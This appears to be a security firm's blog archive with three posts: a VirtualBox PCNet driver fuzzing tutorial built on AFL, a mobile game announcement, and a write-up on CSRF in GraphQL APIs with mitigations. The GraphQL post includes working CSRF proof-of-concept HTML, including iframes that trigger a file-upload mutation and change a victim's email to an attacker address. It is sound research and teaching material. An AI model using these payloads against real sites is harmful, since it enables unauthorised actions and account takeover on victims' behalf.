$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/DevVGA-SVGA3d-glLdr.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/VBoxDTraceLibCWrappers.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/os_Linux_x86_64.patch

Running kmk without KBUILD_TYPE yields instrumented binaries, where the device drivers are bundled inside the VBoxDD.so shared object. The output from nm confirms the presence of the instrumentation symbols:

$ nm out/linux.amd64/release/bin/VBoxDD.so | egrep "afl|sancov"
                 U __afl_area_ptr
                 U __afl_coverage_discard
                 U __afl_coverage_off
                 U __afl_coverage_on
                 U __afl_coverage_skip
000000000033e124 d __afl_selective_coverage
0000000000028030 t sancov.module_ctor_trace_pc_guard
000000000033f5a0 d __start___sancov_guards
000000000036f158 d __stop___sancov_guards

Creating Coverage Reports

First, we have to apply the patches for AFL, described in the previous section. After that, we copy the instrumented version and remove the earlier compiled binaries if they are present:

$ VERSION=6.1.30
$ cp -r ~/VirtualBox-$VERSION-release-afl ~/VirtualBox-$VERSION-release-afl-gcov
$ cd ~/VirtualBox-$VERSION-release-afl-gcov
$ rm -rf out

Now we have to edit the kBuild/tools/AFL.kmk template to append -fprofile-instr-generate -fcoverage-mapping switches as follows:

TOOL_AFL_CC  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_CXX ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_AS  ?= afl-clang-fast$(HOSTSUFF_EXE)   -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_LD  ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping

To avoid duplication, we share the src and include folders with the fuzzing build:

$ rm -rf ./src
$ rm -rf ./include

$ ln -s ../VirtualBox-$VERSION-release-afl/src $PWD/src
$ ln -s ../VirtualBox-$VERSION-release-afl/include $PWD/include

Lastly, we expand the list of undefined symbols inside src/VBox/Additions/x11/undefined_xfree86 by adding:

ftell
uname
strerror
mkdir
__cxa_atexit
fclose
fileno
fdopen
strrchr
fseek
fopen
ftello
prctl
strtol
getpid
mmap
getpagesize
strdup

Furthermore, because this build is intended for reporting only, we disable all unnecessary features:

$ ./configure --disable-hardening --disable-docs --disable-java --disable-qt
$ source ./env.sh && kmk

The raw profile is generated by setting the LLVM_PROFILE_FILE environment variable before running the instrumented binary. The Clang documentation on source-based code coverage provides the necessary details.
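As a rough sketch of the post-processing step, the Python helper below only assembles the usual llvm-profdata and llvm-cov command lines that turn raw profiles into an HTML report. The helper names, the profile file pattern, the merged profile name, and the output directory are all assumptions made for illustration; they are not part of the original setup.

```python
import os
from typing import Dict, List, Sequence


def profile_env(pattern: str = "vbox-%p.profraw") -> Dict[str, str]:
    """Environment for the instrumented run; %p expands to the process ID."""
    env = dict(os.environ)
    env["LLVM_PROFILE_FILE"] = pattern  # hypothetical file name pattern
    return env


def report_commands(
    raw_profiles: Sequence[str],
    objects: Sequence[str],
    merged: str = "vbox.profdata",   # hypothetical merged profile name
    out_dir: str = "coverage-html",  # hypothetical report directory
) -> List[List[str]]:
    """Build the merge and report command lines without running them."""
    merge = ["llvm-profdata", "merge", "-sparse", *raw_profiles, "-o", merged]
    show = [
        "llvm-cov", "show", objects[0],
        f"-instr-profile={merged}",
        "-format=html",
        f"-output-dir={out_dir}",
    ]
    # Additional instrumented binaries or shared objects are passed with -object.
    for extra in objects[1:]:
        show += ["-object", extra]
    return [merge, show]
```

The returned lists can be handed to subprocess.run one by one, for example with the harness binary first and out/linux.amd64/release/bin/VBoxDD.so as an additional object.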

Writing a harness

Getting pVM

At this point, the VirtualBox drivers are fully instrumented, and the only thing left before we start fuzzing is a harness. The PCNet device driver is defined in src/VBox/Devices/Network/DevPCNet.cpp, and it exports several functions. The listing below is truncated to include only the R3 components, as these are the ones we are targeting:

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
    /* .u32Version = */             PDM_DEVREG_VERSION,
    /* .uReserved0 = */             0,
    /* .szName = */                 "pcnet",
#ifdef PCNET_GC_ENABLED
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS | PDM_DEVREG_FLAGS_RZ | PDM_DEVREG_FLAGS_NEW_STYLE,
#else
    /* .fFlags = */                 PDM_DEVREG_FLAGS_DEFAULT_BITS,
#endif
    /* .fClass = */                 PDM_DEVREG_CLASS_NETWORK,
    /* .cMaxInstances = */          ~0U,
    /* .uSharedVersion = */         42,
    /* .cbInstanceShared = */       sizeof(PCNETSTATE),
    /* .cbInstanceCC = */           sizeof(PCNETSTATECC),
    /* .cbInstanceRC = */           sizeof(PCNETSTATERC),
    /* .cMaxPciDevices = */         1,
    /* .cMaxMsixVectors = */        0,
    /* .pszDescription = */         "AMD PCnet Ethernet controller.\n",
#if defined(IN_RING3)
    /* .pszRCMod = */               "VBoxDDRC.rc",
    /* .pszR0Mod = */               "VBoxDDR0.r0",
    /* .pfnConstruct = */           pcnetR3Construct,
    /* .pfnDestruct = */            pcnetR3Destruct,
    /* .pfnRelocate = */            pcnetR3Relocate,
    /* .pfnMemSetup = */            NULL,
    /* .pfnPowerOn = */             NULL,
    /* .pfnReset = */               pcnetR3Reset,
    /* .pfnSuspend = */             pcnetR3Suspend,
    /* .pfnResume = */              NULL,
    /* .pfnAttach = */              pcnetR3Attach,
    /* .pfnDetach = */              pcnetR3Detach,
    /* .pfnQueryInterface = */      NULL,
    /* .pfnInitComplete = */        NULL,
    /* .pfnPowerOff = */            pcnetR3PowerOff,
    /* .pfnSoftReset = */           NULL,
    /* .pfnReserved0 = */           NULL,
    /* .pfnReserved1 = */           NULL,
    /* .pfnReserved2 = */           NULL,
    /* .pfnReserved3 = */           NULL,
    /* .pfnReserved4 = */           NULL,
    /* .pfnReserved5 = */           NULL,
    /* .pfnReserved6 = */           NULL,
    /* .pfnReserved7 = */           NULL,
#elif defined(IN_RING0)
// [ SNIP ]

The most interesting fields are .pfnReset, which resets the driver’s state, and the .pfnReserved functions. The latter are currently unused, but we can add our own functions and call them by modifying the PDM (Pluggable Device Manager) header files. PDM is an abstract interface used to add new virtual devices relatively easily.

But first, if we want to use the modified VBoxHeadless, which provides a high-level interface (VirtualBox Main API) to the VirtualBox functionality, we need to find a way to access the pdm structure.

By reading the source code, we can see multiple patterns where pVM (pointer to a VM handle) is dereferenced to traverse a linked list with all device instances:

// src/VBox/VMM/VMMR3/PDMDevice.cpp

for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3)
{
    // [ SNIP ]
}

The VirtualBox Main API on non-Windows platforms uses Mozilla XPCOM. So we wanted to find out if we could leverage it to access the low-level structures. After some digging, we found out that indeed it’s possible to retrieve the VM handle via the IMachineDebugger class:

IMachineDebugger VM

With that, the following snippet of code demonstrates how to access pVM:

LONG64 llVM;
HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;

After obtaining the pointer to the VM, we have to change the build scripts again, allowing VBoxHeadless to access internal PDM definitions from VBoxHeadless.cpp.

We tried to minimize the number of changes and, after some experimentation, came up with the following steps:

1) Create a new file called src/VBox/Frontends/Common/harness.h with this content:

/* without this, include/VBox/vmm/pdmtask.h does not import PDMTASKTYPE enum */
#define VBOX_IN_VMM 1

#include "PDMInternal.h"

/* needed by machineDebugger COM VM getter */
#include <VBox/vmm/vm.h>
#include <VBox/vmm/uvm.h>

/* needed by AFL */
#include <unistd.h>

2) Modify the src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp file by adding the following code just before the event loop starts, near the end of the file:

            LogRel(("VBoxHeadless: failed to start windows message monitor: %Rrc\n", irc));
#endif /* RT_OS_WINDOWS */

        /* --------------- BEGIN --------------- */
        LONG64 llVM;
        HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);

        if (SUCCEEDED(hrc)) {
            /* Only dereference the handle once the getter has succeeded */
            PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
            PVM pVM = pUVM->pVM;

            /* Walk the device instances until we find the driver under test */
            for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3) {
                if (!strcmp(pDevIns->pReg->szName, "pcnet")) {

                    unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
                    while (__AFL_LOOP(10000))
                    {
                        int len = __AFL_FUZZ_TESTCASE_LEN;
                        pDevIns->pReg->pfnAFL(pDevIns, buf, len);
                    }
                }
            }
        }
        exit(0);
        /* ---------------  END  --------------- */

        /*
         * Pump vbox events forever
         */
        LogRel(("VBoxHeadless: starting event loop\n"));
        for (;;)

In the same file after the #include "PasswordInput.h" directive, add:

#include "harness.h"

Finally, add __AFL_FUZZ_INIT(); just before the definition of the TrustedMain function:

__AFL_FUZZ_INIT();

/**
 *  Entry point.
 */
extern "C" DECLEXPORT(int) TrustedMain(int argc, char **argv, char **envp)

3) Edit src/VBox/Frontends/VBoxHeadless/Makefile.kmk and change the VBoxHeadless_DEFS and VBoxHeadless_INCS from

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,)
VBoxHeadless_INCS      = \
  $(VBOX_GRAPHICS_INCS) \
  ../Common

to

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,) $(VMM_COMMON_DEFS)
VBoxHeadless_INCS      = \
        $(VBOX_GRAPHICS_INCS) \
        ../Common \
        ../../VMM/include

Fuzzing With Multiple Inputs

For the network drivers, there are various ways of supplying the user-controlled data: by using I/O port access instructions or by reading the data from the emulated device via MMIO (PDMDevHlpPhysRead). If this part is unclear, please refer back to [1] in references, which is probably the best available resource for explaining the attack surface. Moreover, many ports or values are restricted to a specific set, and to save some time, we want to use only these values. Therefore, while considering how to implement our fuzzing framework, we discovered the Fuzzed Data Provider (FDP from here on).

FDP is part of LLVM and, after we pass it a buffer generated by AFL, it can use that buffer to generate a restricted set of numbers, bytes, or enums. We can store the pointer to FDP inside the device driver instance and retrieve it any time we want to feed some buffer.
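To make the idea concrete, here is a toy Python model of how a raw fuzzer buffer can be decoded into a sequence of constrained operations (handler choice, port, value, access width). It is only a sketch: the class and function names are invented, and its byte-consumption order and range mapping differ from LLVM's real FuzzedDataProvider.

```python
from typing import List, Sequence, Tuple


class ToyDataProvider:
    """Toy stand-in for a fuzzed-data provider: slices typed values off a buffer."""

    def __init__(self, data: bytes) -> None:
        self._data = data
        self._pos = 0

    def remaining_bytes(self) -> int:
        return len(self._data) - self._pos

    def consume_int(self, size: int) -> int:
        # Missing bytes count as zero, so an exhausted buffer still decodes.
        chunk = self._data[self._pos:self._pos + size]
        self._pos += len(chunk)
        return int.from_bytes(chunk, "little")

    def consume_in_range(self, lo: int, hi: int) -> int:
        # Maps one byte into [lo, hi]; assumes the range spans at most 256 values.
        return lo + self.consume_int(1) % (hi - lo + 1)

    def pick(self, values: Sequence[int]) -> int:
        return values[self.consume_in_range(0, len(values) - 1)]


def decode_ops(data: bytes) -> List[Tuple[int, int, int, int]]:
    """Decode (choice, port, value, width) tuples until the buffer runs out."""
    provider = ToyDataProvider(data)
    ops = []
    while provider.remaining_bytes() > 0:
        choice = provider.consume_in_range(0, 3)  # which handler to call
        port = provider.consume_int(2)            # 16-bit port offset
        value = provider.consume_int(4)           # 32-bit value to write
        width = provider.pick((1, 2, 4))          # only valid access widths
        ops.append((choice, port, value, width))
    return ops
```

The point of the restriction is visible in the width field: whatever bytes the fuzzer produces, the decoded access width is always 1, 2, or 4, so no executions are wasted on values the device would reject outright.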

Recall that we can use the pfnReserved fields to implement our fuzzing helper functions. For this, it’s enough to edit include/VBox/vmm/pdmdev.h and change the PDMDEVREGR3 structure to conform to our prototype:

DECLR3CALLBACKMEMBER(int, pfnAFL, (PPDMDEVINS pDevIns, unsigned char *buf, int len));
DECLR3CALLBACKMEMBER(void *, pfnGetFDP, (PPDMDEVINS pDevIns));
DECLR3CALLBACKMEMBER(int, pfnReserved2, (PPDMDEVINS pDevIns));

All device drivers have a state, which we can access using the convenient PDMDEVINS_2_DATA macro. Likewise, we can include the FDP header file and extend the state structure (in our case PCNETSTATE) with a pointer to FDP:

// src/VBox/Devices/Network/DevPCNet.cpp

#ifdef IN_RING3
# include <iprt/mem.h>
# include <iprt/semaphore.h>
# include <iprt/uuid.h>
# include <fuzzer/FuzzedDataProvider.h> /* Add this */
#endif

// [ SNIP ]

typedef struct PCNETSTATE
{
  // [ SNIP ]
#endif /* VBOX_WITH_STATISTICS */
    void * fdp; /* Add this */
} PCNETSTATE;
/** Pointer to a shared PCnet state structure. */
typedef PCNETSTATE *PPCNETSTATE;

To reflect these changes, the g_DevicePCNet structure has to be updated too:

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
  // [[ SNIP ]]
  /* .pfnConstruct = */           pcnetR3Construct,
  // [[ SNIP ]]
  /* .pfnReserved0 = */           pcnetR3_AFL,
  /* .pfnReserved1 = */           pcnetR3_GetFDP,

When adding new functions, we must be careful to place them inside R3-only parts. The easiest way is to find the R3 constructor and add the new code just after it, as the IN_RING3 macro is already defined there for the conditional compilation.

An example of the PCNet harness:

static DECLCALLBACK(void *) pcnetR3_GetFDP(PPDMDEVINS pDevIns) {
    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);
    return pThis->fdp;
}

__AFL_COVERAGE();
static DECLCALLBACK(int) pcnetR3_AFL(PPDMDEVINS pDevIns, unsigned char *buf, int len)
{
    if (len > 0x2000) {
        __AFL_COVERAGE_SKIP();
        return VINF_SUCCESS;
    }

    static unsigned char buf2[0x2000];
    memcpy(buf2, buf, len);
    FuzzedDataProvider provider(buf2, len);

    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);

    pThis->fdp = &provider; // Make it accessible for the other modules
    FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);

    void *pvUser = NULL;
    uint32_t u32;
    const std::array<int, 3> Array = {1, 2, 4};
    uint16_t offPort;
    uint16_t cb;

    pcnetR3Reset(pDevIns);

    __AFL_COVERAGE_DISCARD();
    __AFL_COVERAGE_ON();

    while (pfdp->remaining_bytes() > 0) {
        auto choice = pfdp->ConsumeIntegralInRange(0, 3);
        offPort = pfdp->ConsumeIntegral<uint16_t>();

        u32 = pfdp->ConsumeIntegral<uint32_t>();
        cb = pfdp->PickValueInArray(Array);

        switch (choice) {
            case 0:
                // pcnetIoPortWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 1:
                // pcnetIoPortAPromWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortAPromWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 2:
                // pcnetR3MmioWrite(PPDMDEVINS pDevIns, void *pvUser,
                //   RTGCPHYS off, void const *pv, unsigned cb)
                pcnetR3MmioWrite(pDevIns, pvUser, offPort, &u32, cb);
                break;
            default:
                break;
        }

    }
    __AFL_COVERAGE_OFF();

    pThis->fdp = NULL;
    return VINF_SUCCESS;
}

Fuzzing PDMDevHlpPhysRead

As the device driver calls this function multiple times, we decided to patch the wrapper instead of modifying every instance. We can do so by editing src/VBox/VMM/VMMR3/PDMDevHlp.cpp, adding the relevant FDP header, and changing the pdmR3DevHlp_PhysRead method to fuzz only the specific driver.

#include "dtrace/VBoxVMM.h"
#include "PDMInline.h"

#include <fuzzer/FuzzedDataProvider.h> /* Add this */

// [ SNIP ]

/** @interface_method_impl{PDMDEVHLPR3,pfnPhysRead} */
static DECLCALLBACK(int) pdmR3DevHlp_PhysRead(PPDMDEVINS pDevIns, RTGCPHYS GCPhys, void *pvBuf, size_t cbRead)
{
    PDMDEV_ASSERT_DEVINS(pDevIns);
    PVM pVM = pDevIns->Internal.s.pVMR3;
    LogFlow(("pdmR3DevHlp_PhysRead: caller='%s'/%d: GCPhys=%RGp pvBuf=%p cbRead=%#x\n",
             pDevIns->pReg->szName, pDevIns->iInstance, GCPhys, pvBuf, cbRead));

    /* Change this for the fuzzed driver */
    if (!strcmp(pDevIns->pReg->szName, "pcnet")) {
        FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);
        if (pfdp && pfdp->remaining_bytes() >= cbRead) {
            pfdp->ConsumeData(pvBuf, cbRead);
            return VINF_SUCCESS;
        }
    }

Using out/linux.amd64/release/bin/VBoxNetAdpCtl, we can add our network adapter and start fuzzing in persistent mode. However, even though we can reach more than 10k executions per second, we still have some work to do on stability.

Improving Stability

Unfortunately, none of the methods described here worked, as we were not able to use LTO instrumentation. We guess that’s because the device drivers module was dynamically loaded; as a result, partially disabling instrumentation was not possible, nor was it possible to identify unstable edges. The instability is caused by not properly resetting the driver’s state, and because we are running the whole VM, there are many things under the hood which are not easy to influence, such as internal locks or VMM.

One of the improvements is already contained in the harness, as we can discard the coverage before we start fuzzing and enable it only for a short fuzzing block.

Additionally, we can disable the instantiation of all devices which we are not currently fuzzing. The relevant code is inside src/VBox/VMM/VMMR3/PDMDevice.cpp, implementing the init completion routine through pdmR3DevInit. For the PCNet driver, at least the pci, VMMDev, and pcnet modules must be enabled. Therefore, we can skip the initialization for the rest.

    /*
     *
     * Instantiate the devices.
     *
     */
    for (i = 0; i < cDevs; i++)
    {
        PDMDEVREGR3 const * const pReg = paDevs[i].pDev->pReg;

        // if (!strcmp(pReg->szName, "pci")) {continue;}
        if (!strcmp(pReg->szName, "ich9pci")) {continue;}
        if (!strcmp(pReg->szName, "pcarch")) {continue;}
        if (!strcmp(pReg->szName, "pcbios")) {continue;}
        if (!strcmp(pReg->szName, "ioapic")) {continue;}
        if (!strcmp(pReg->szName, "pckbd")) {continue;}
        if (!strcmp(pReg->szName, "piix3ide")) {continue;}
        if (!strcmp(pReg->szName, "i8254")) {continue;}
        if (!strcmp(pReg->szName, "i8259")) {continue;}
        if (!strcmp(pReg->szName, "hpet")) {continue;}
        if (!strcmp(pReg->szName, "smc")) {continue;}
        if (!strcmp(pReg->szName, "flash")) {continue;}
        if (!strcmp(pReg->szName, "efi")) {continue;}
        if (!strcmp(pReg->szName, "mc146818")) {continue;}
        if (!strcmp(pReg->szName, "vga")) {continue;}
        // if (!strcmp(pReg->szName, "VMMDev")) {continue;}
        // if (!strcmp(pReg->szName, "pcnet")) {continue;}
        if (!strcmp(pReg->szName, "e1000")) {continue;}
        if (!strcmp(pReg->szName, "virtio-net")) {continue;}
        // if (!strcmp(pReg->szName, "IntNetIP")) {continue;}
        if (!strcmp(pReg->szName, "ichac97")) {continue;}
        if (!strcmp(pReg->szName, "sb16")) {continue;}
        if (!strcmp(pReg->szName, "hda")) {continue;}
        if (!strcmp(pReg->szName, "usb-ohci")) {continue;}
        if (!strcmp(pReg->szName, "acpi")) {continue;}
        if (!strcmp(pReg->szName, "8237A")) {continue;}
        if (!strcmp(pReg->szName, "i82078")) {continue;}
        if (!strcmp(pReg->szName, "serial")) {continue;}
        if (!strcmp(pReg->szName, "oxpcie958uart")) {continue;}
        if (!strcmp(pReg->szName, "parallel")) {continue;}
        if (!strcmp(pReg->szName, "ahci")) {continue;}
        if (!strcmp(pReg->szName, "buslogic")) {continue;}
        if (!strcmp(pReg->szName, "pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "ich9pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicscsi")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicsas")) {continue;}
        if (!strcmp(pReg->szName, "virtio-scsi")) {continue;}
        if (!strcmp(pReg->szName, "GIMDev")) {continue;}
        if (!strcmp(pReg->szName, "lpc")) {continue;}

       /*
         * Gather a bit of config.
         */
        /* trusted */

The most significant issue is that minimizing our test cases is not an option when the stability is low (the percentage depends on the drivers we fuzz). If we cannot reproduce the crash, we can at least intercept it and analyze it afterward in gdb.

We ran AFL in debug mode as a workaround, which yields a core file after every crash. Before running the fuzzer, this behavior can be enabled by:

$ export AFL_DEBUG=1
$ ulimit -c unlimited

Conclusion

We presented one of the possible approaches to fuzzing VirtualBox device drivers. We hope it contributes to a better understanding of VirtualBox internals. For inspiration, I’ll leave you with a quote from doc/VBox-CodingGuidelines.cpp:

 * (2)  "A really advanced hacker comes to understand the true inner workings of
 *      the machine - he sees through the language he's working in and glimpses
 *      the secret functioning of the binary code - becomes a Ba'al Shem of
 *      sorts."   (Neal Stephenson "Snow Crash")

References


H1.Jack, The Game

As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing line of business - just having fun with computers!

We believe that the greatest lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle, we’re always challenging ourselves to improve our craft.

During the fall of 2019, we embarked on a pretty ambitious goal despite having virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of our spare time in 2020 working on the core mechanics and graphics. Unfortunately, the limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses.

Despite it all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play game with no advertisements. We hope you’ll enjoy the game in between your commutes and lunch breaks!

No malware included.

H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame in gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough!

H1jack Room

While playing, you might end up talking to John or Luca.

Luca&John H1jack

Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:


That single GraphQL issue that you keep missing

With the increasing popularity of GraphQL on the web, we would like to discuss a particular class of vulnerabilities that is often hidden in GraphQL implementations.

GraphQL what?

GraphQL is an open source query language, loved by many, that can help you in building meaningful APIs. Its major features are:

  • Aggregating data from multiple sources
  • Decoupling the data from the database underneath, through a graph form
  • Ensuring input type correctness with minimal effort from the developers

CSRF eh?

Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web application causes a web browser to perform an unwanted action on behalf of an authenticated user. Such an attack works because browser requests automatically include all cookies, including session cookies.

GraphQL CSRF: more buzzword combos please!

POST-based CSRF

POST requests are natural CSRF targets, since they usually change the application state. GraphQL endpoints typically accept Content-Type headers set to application/json only, which is widely believed to be invulnerable to CSRF. As multiple layers of middleware may translate the incoming requests from other formats (e.g. query parameters, application/x-www-form-urlencoded, multipart/form-data), GraphQL implementations are often affected by CSRF. Another incorrect assumption is that JSON cannot be created from urlencoded requests. When both of these assumptions are made, many developers may incorrectly forego implementing proper CSRF protections.

The false sense of security works in the attacker’s favor, since it creates an attack surface which is easier to exploit. For example, a valid GraphQL query can be issued with a simple application/json POST request:

POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 100
accept: */*
User-Agent: ...
content-type: application/json
Referer: https://redacted/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...

{"operationName":null,"variables":{},"query":"{\n  user {\n    firstName\n    __typename\n  }\n}\n"}

It is common, due to middleware magic, for a server to accept the same request as a form-urlencoded POST request:

POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 72
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://redacted
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...

query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A

A seasoned Burp user can quickly convert this request to a CSRF PoC through Engagement Tools > Generate CSRF PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://redacted/graphql" method="POST">
      <input type="hidden" name="query" value="&#123;&#10;&#32;&#32;user&#32;&#123;&#10;&#32;&#32;&#32;&#32;firstName&#10;&#32;&#32;&#32;&#32;&#95;&#95;typename&#10;&#32;&#32;&#125;&#10;&#125;&#10;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

While the example above only presents a harmless query, that’s not always the case. Since GraphQL resolvers are usually decoupled from the underlying application layer, any other operation can be issued in the same way, including mutations.
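The translation from the JSON body to the form-encoded body shown earlier is mechanical. The Python sketch below reproduces it; the function name is made up, and sending variables as a JSON-encoded string in a form field is an assumption about what the receiving middleware accepts.

```python
import json
from urllib.parse import urlencode


def json_body_to_form(json_body: str) -> str:
    """Re-encode a GraphQL JSON request body as application/x-www-form-urlencoded."""
    payload = json.loads(json_body)
    fields = {"query": payload["query"]}
    # Optional members are only sent when they carry a value.
    if payload.get("variables"):
        fields["variables"] = json.dumps(payload["variables"])
    if payload.get("operationName"):
        fields["operationName"] = payload["operationName"]
    return urlencode(fields)


# The JSON body from the first request in this section.
body = r'{"operationName":null,"variables":{},"query":"{\n  user {\n    firstName\n    __typename\n  }\n}\n"}'
form_body = json_body_to_form(body)
```

For this input, form_body is the same 72-byte string as the body of the form-urlencoded request above, which is exactly what an HTML form with a single hidden query field would submit.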

GET Based CSRF

There are two common issues that we have spotted during our past engagements.

The first one is using GET requests for both queries and mutations.

For example, in one of our recent engagements, the application was exposing a GraphiQL console. GraphiQL is only intended for use in development environments. When misconfigured, it can be abused to perform CSRF attacks on victims, causing their browsers to issue arbitrary query or mutation requests. In fact, GraphiQL does allow mutations via GET requests.

While CSRF in standard web applications usually affects only a handful of endpoints, the same issue in GraphQL is generally system-wide.

As an example, we include the Proof-of-Concept for a mutation that handles file uploads:

<!DOCTYPE html>
<html>
<head>
    <title>GraphQL CSRF file upload</title>
</head>
	<body>
		<iframe src="https://graphql.victimhost.com/?query=mutation%20AddFile(%24name%3A%20String!%2C%20%24data%3A%20String!%2C%20%24contentType%3A%20String!) %20%7B%0A%20%20AddFile(file_name%3A%20%24name%2C%20data%3A%20%24data%2C%20content_type%3A%20%24contentType) %20%7B%0A%20%20%20%20id%0A%20%20%20%20__typename%0A%20%20%7D%0A%7D%0A&variables=%7B%0A %20%20%22data%22%3A%20%22%22%2C%0A%20%20%22name%22%3A%20%22dummy.pdf%22%2C%0A%20%20%22contentType%22%3A%20%22application%2Fpdf%22%0A%7D"></iframe>
	</body>
</html>

The second issue arises when a state-changing GraphQL operation is misplaced among the queries, which are normally non-state-changing. In fact, most of the GraphQL server implementations respect this paradigm, and they even block any kind of mutation through the GET HTTP method. Discovering this type of issue is trivial, and can be performed by enumerating query names and trying to understand what they do. For this reason, we developed a tool for query/mutation enumeration.
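The triage idea can be sketched in a few lines of Python. This is not the tool mentioned above, only a naive heuristic: it flags query names whose first word is a verb that suggests a state change. The verb list and the function name are assumptions, and anything flagged still needs manual review.

```python
import re
from typing import Iterable, List

# Hypothetical list of verbs that hint at a state-changing operation.
STATE_CHANGING_VERBS = {"set", "add", "create", "update", "delete", "remove", "reset", "send"}


def suspicious_queries(query_names: Iterable[str]) -> List[str]:
    """Return the query names whose leading word looks like a state-changing verb."""
    flagged = []
    for name in query_names:
        # First camelCase, PascalCase, or snake_case word of the name.
        match = re.match(r"[A-Z]?[a-z0-9]+", name)
        if match and match.group(0).lower() in STATE_CHANGING_VERBS:
            flagged.append(name)
    return flagged
```

Matching on the whole first word rather than on a prefix keeps names such as settings from being flagged just because they start with set.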

During an engagement, we discovered the following query that was issuing a state changing operation:

req := graphql.NewRequest(`
	query SetUserEmail($email: String!) {
		SetUserEmail(user_email: $email) {
			id
			email
		}
	}
`)

Given that the id value was easily guessable, we were able to prepare a CSRF PoC:

<!DOCTYPE html>
<html>
	<head>
		<title>GraphQL CSRF - State Changing Query</title> 
	</head>
	<body>
		<iframe width="1000" height="1000" src="https://victimhost.com/?query=query%20SetUserEmail%28%24email%3A%20String%21%29%20%7B%0A%20%20SetUserEmail%28user_email%3A%20%24email%29%20%7B%0A%20%20%20%20id%0A%20%20%20%20email%0A%20%20%7D%0A%7D%0A%26variables%3D%7B%0A%20%20%22id%22%3A%20%22441%22%2C%0A%20%20%22email%22%3A%20%22attacker%40email.xyz%22%2C%0A%7D"></iframe>
	</body>
</html>

Despite the most frequently used GraphQL servers/libraries having some sort of protection against CSRF, we have found that in some cases developers bypass the CSRF protection mechanisms. For example, if graphene-django is in use, there is an easy way to deactivate the CSRF protection on a particular GraphQL endpoint:

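from django.views.decorators.csrf import csrf_exempt
from graphene_django.views import GraphQLView

urlpatterns = patterns(
    # ...
    # csrf_exempt switches off Django's CSRF check for this view
    url(r'^graphql', csrf_exempt(GraphQLView.as_view(graphiql=True))),
    # ...
)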

CSRF: Better Safe Than Sorry

Some browsers, such as Chrome, recently defaulted cookie behavior to be equivalent to SameSite=Lax, which protects from the most common CSRF vectors.

Other prevention methods can be implemented within each application. The most common are:

  • Built-in CSRF protection in modern frameworks
  • Origin verification
  • Double submit cookies
  • User interaction based protection
  • Not using GET requests for state-changing operations
  • Extending CSRF protection to GET requests too

There isn’t necessarily a single best option for every application. Determining the best protection requires evaluating the specific environment on a case-by-case basis.
